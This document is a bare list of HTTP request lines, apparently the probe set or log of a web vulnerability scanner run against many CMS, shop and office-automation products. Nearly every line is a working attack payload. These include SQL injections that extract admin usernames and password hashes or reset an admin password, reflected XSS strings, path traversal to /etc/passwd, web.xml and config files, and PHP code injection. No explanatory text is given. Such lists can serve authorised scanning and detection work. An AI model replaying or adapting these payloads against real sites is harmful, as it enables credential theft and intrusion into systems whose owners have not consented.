GET /user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
GET /ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
GET /statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
POST /inquiry.php?action=inquiry
GET /install/index.php?_m=frontpage&_a=check
POST /api.php?act=get_spec_single&api_version=3.1
GET /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
POST /api.php?act=get_product_detail_info&api_version=3.1
POST /api.php?act=get_products_list&api_version=3.1
POST /?tools-products.html
POST /index.php?case=admin&act=login&admin_dir=admin&site=default
GET /index.php?case=user&act=space&mid=1
GET /?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
GET /ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
GET /index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
GET /index.php?m=Order&a=index
GET /index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
POST /api/search.php?moduleid=5
POST /item.php?act=ajax&do=subject&op=get_membereffect
GET /include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
GET /include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
GET /do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
GET /?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
POST /?case=manage&act=guestadd&manage=archive&guest=1
GET /article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
GET /phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
GET /u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
GET /index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
GET /misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
GET /general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
GET /jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
POST /member.php?act=login&op=forget&rand=U7183
GET /mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
POST /bocadmin/j/uploadify.php
POST /index.php?app=main&func=common&action=upFile&act=upforhtmleditor
POST /lib/upload/upload.php
GET /jcms/setup/publishadmin.jsp
GET /jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
GET /jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
GET /index.php?app=user&ac=../../../robots.txt%00
GET /index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
GET /index.php?app=/../robots.txt%00
POST /utility/convert/index.php
POST /utility/convert/data/config.inc.php
GET /install/svinfo.php
GET /posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
POST /wap/index.php?mod=login&action=login
GET /wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
POST /cart.php
POST /api.php?act=set_shopex_conf&api_version=5.0
GET /report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
POST /user.php?act=signin
GET /CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
GET /admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
GET /Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
GET /ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
GET /DownloadShow.asp
GET /NewsClass.asp
GET /plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
GET /index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
GET /Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
GET /temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
POST /api.php?act=search_dly_type&api_version=1.0
GET /api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
GET /?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
GET /aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
POST /lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /index.php?m=message&s=inquiry_basket
GET /index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
GET /index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
GET /index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
GET /index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
GET /index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
GET /notes.php?action=view&nid=1-websec
GET /?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
GET /general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /Search.asp
GET /suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
GET /ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
GET /cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
GET /download.php?tfile=%5C..%5C..%5Cconfig.php
GET /plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
POST /api.php?act=search_sub_regions&api_version=1.0
GET /index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
GET /index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
GET /index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
GET /index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
GET /index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
GET /index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
GET /manage/WAP/Other/AddDalen.aspx?menu=add
GET /login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
GET /install/step4.aspx
HEAD /DataBase/%23zhi_rui_v_Base.mdb
GET /manage/Shop/profile/LmUserManage.aspx
GET /API/GetPageHtml.aspx
GET /stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
GET /manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
GET /msgChat/download.jsp?url=msgChat/download.jsp
GET /admin.php
GET /index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
POST /index/searchInfoTcontentByCategory.action
POST /emlib4/system/datasource/selectrecordset.aspx
POST //index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
GET /home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
GET /web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
GET /ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
GET /index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
GET /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
GET /customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
GET /module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
POST /module/AIP/upload.php?RUN_ID=1&T_ID=1
GET /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
POST /index.php?m=company&s=admin/business_info_list
GET /index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
POST /getpwd4.asp
GET /?m=offer&s=offer_list&id=1-webscan%23
POST /MemberLogin.asp
GET /views.asp
GET /basket.asp?h%77_id=513%20and%201=2
GET /protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
POST /index.php?app=tag&ac=add&ts=do
GET /member/index.php?ugid31=51'%20and%20'1122'='12
GET /siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
GET /UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
GET /search.php?mod=information&ids=1-webscan&catid=1
POST /box.php?
GET /siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
GET /siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
GET //siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
GET /siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
GET /downLoadFile.action?filePath=/WEB-INF/web.xml
GET /siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
GET /SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
GET /job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
GET /searchLines.aspx?LName=h%25';
GET /ProductBuy.Asp
GET /newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
GET /searchLines.aspx?LName=h&t=webscan()'
GET /viewlist.aspx?typeid=webscan()'
GET /company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
POST /resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
GET /?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
GET /admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
GET /index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
GET /gallery--p,0,1122%20and%200-0---1.html
GET /?m=info.detail&id=1-webscan
GET /misc.php?mod=getuserinfo&uid=-1
POST /?m=city.getSearch&index=reer
GET /?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
GET /admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /Product.asp
POST /user/getpassword.asp
GET /admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
POST /plus/ajax_user.php?act=check_email
POST /plus/ajax_user.php?act=check_usname
GET /HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
GET /ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
GET /ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
GET /ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
GET /index.php?app=user&ac=plugin&in=../../robots.txt%00
POST /member.php?act=login&op=forget
GET /item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
GET /?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
GET /index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
GET /?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
GET /index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
GET /index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
GET /wap/index.php
GET /deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
GET /statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
GET /member/index.php
GET /wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
GET /index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
POST /video.php
POST /news.php?classid=2
GET /ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
GET /count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
POST /ajax.php?action=contentpage
GET /comments.php?id=3a&tablepre=boka_ckck
GET /rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
GET //wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
GET /admin/index.php?_m=../template/css/login.css%00&_a=admin_list
GET /case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
GET /login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
GET /info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
POST /ajax.php?action=letter&letter=a
GET /index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
GET /index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
GET /index.php/Index/index/name/$%7B@print(md5(1122))%7D
GET /index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
POST /index.php?m=payment&s=admin/pickupmod
GET /admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
GET /user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
HEAD /servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
POST /mep-admin/DcServlet
